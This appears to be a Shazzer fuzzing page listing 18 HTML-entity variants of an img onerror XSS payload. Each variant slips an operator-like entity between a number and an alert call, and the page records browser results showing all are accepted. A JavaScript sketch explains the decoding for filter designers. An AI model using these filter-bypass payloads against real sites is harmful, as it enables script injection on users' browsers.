Entities allowed between function call and number

This vector uses Shazzer's new features to check which entities are allowed between a function call and a number, using images. The results are still a bit inconsistent because I currently wait for page load.

Created by: hackvertor

Created on: 7/2/2024, 11:29:20 AM

Updated on: 7/4/2024, 1:20:10 AM

Vector type: XSS

Template used:
<img src=data: onerror="1$[data1]log('html($[data1])')">

Sample payloads

<img src=data: onerror="1&VerticalLine;alert('&#38;VerticalLine;')">
<img src=data: onerror="1&semi;alert('&#38;semi;')">
<img src=data: onerror="1&midast;alert('&#38;midast;')">
<img src=data: onerror="1&amp;alert('&#38;amp;')">
<img src=data: onerror="1&NewLine;alert('&#38;NewLine;')">
<img src=data: onerror="1&plus;alert('&#38;plus;')">
<img src=data: onerror="1&LT;alert('&#38;LT;')">
<img src=data: onerror="1&sol;alert('&#38;sol;')">
<img src=data: onerror="1&ast;alert('&#38;ast;')">
<img src=data: onerror="1&Hat;alert('&#38;Hat;')">
<img src=data: onerror="1&lt;alert('&#38;lt;')">
<img src=data: onerror="1&verbar;alert('&#38;verbar;')">
<img src=data: onerror="1&comma;alert('&#38;comma;')">
<img src=data: onerror="1&gt;alert('&#38;gt;')">
<img src=data: onerror="1&vert;alert('&#38;vert;')">
<img src=data: onerror="1&GT;alert('&#38;GT;')">
<img src=data: onerror="1&AMP;alert('&#38;AMP;')">
<img src=data: onerror="1&percnt;alert('&#38;percnt;')">

Fuzz results

Chrome 126.0.0.0 desktop macOS 10.15.7
Found 18 results
Data: &amp;, &AMP;, &ast;, &comma;, &gt;, &GT;, &Hat;, &lt;, &LT;, &midast;, &NewLine;, &percnt;, &plus;, &semi;, &sol;, &verbar;, &vert;, &VerticalLine;

Safari 18.0 desktop macOS 10.15.7
Found 18 results
Data: &amp;, &AMP;, &ast;, &comma;, &gt;, &GT;, &Hat;, &lt;, &LT;, &midast;, &NewLine;, &percnt;, &plus;, &semi;, &sol;, &verbar;, &vert;, &VerticalLine;

Firefox 127.0 desktop macOS 10.15
Found 18 results
Data: &amp;, &AMP;, &ast;, &comma;, &gt;, &GT;, &Hat;, &lt;, &LT;, &midast;, &NewLine;, &percnt;, &plus;, &semi;, &sol;, &verbar;, &vert;, &VerticalLine;
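
Why all 18 entities are accepted, as an added example that is not part of the original page or Shazzer's code: the HTML parser decodes character references in the attribute value before the handler is compiled, so each one reaches the JavaScript engine as an operator or separator. The entity-to-character table and the helper names are assumptions of this sketch; `new Function` is used only to syntax-check the decoded source and nothing is executed.

```javascript
// Added example (constructed; not Shazzer's code). Named character references
// from the fuzz results, with the character each one decodes to.
const ENTITIES = new Map([
  ["amp", "&"], ["AMP", "&"], ["ast", "*"], ["midast", "*"], ["comma", ","],
  ["gt", ">"], ["GT", ">"], ["Hat", "^"], ["lt", "<"], ["LT", "<"],
  ["NewLine", "\n"], ["percnt", "%"], ["plus", "+"], ["semi", ";"],
  ["sol", "/"], ["verbar", "|"], ["vert", "|"], ["VerticalLine", "|"],
]);

// Single-pass decode of an attribute value, as the HTML tokenizer does before
// the event handler is compiled. Handles numeric references and the table above.
function decodeAttribute(raw) {
  return raw.replace(/&(#[xX][0-9a-fA-F]+|#\d+|[A-Za-z]+);/g, (whole, ref) => {
    if (ref[0] === "#") {
      const hex = ref[1] === "x" || ref[1] === "X";
      return String.fromCodePoint(parseInt(ref.slice(hex ? 2 : 1), hex ? 16 : 10));
    }
    return ENTITIES.has(ref) ? ENTITIES.get(ref) : whole;
  });
}

// Syntax check only: new Function() compiles the body and throws SyntaxError
// if it does not parse. The returned function is never called.
function parses(source) {
  try { new Function(source); return true; } catch (e) { return false; }
}

// Fill the page's template body with one entity and compare raw vs decoded.
function checkEntity(name) {
  const raw = `1&${name};log('&#38;${name};')`;
  const decoded = decodeAttribute(raw);
  return { name, raw, decoded, parses: parses(decoded) };
}

const results = [...ENTITIES.keys()].map(checkEntity);
for (const r of results) {
  console.log(r.name.padEnd(13), JSON.stringify(r.decoded), "parses:", r.parses);
}
// Control: with nothing between the number and the call, the handler is invalid.
console.log("no separator ", JSON.stringify("1log('x')"), "parses:", parses("1log('x')"));
```

A filter that matches operators or separators in the raw attribute text sees none of these characters; inspection has to run on the decoded handler source.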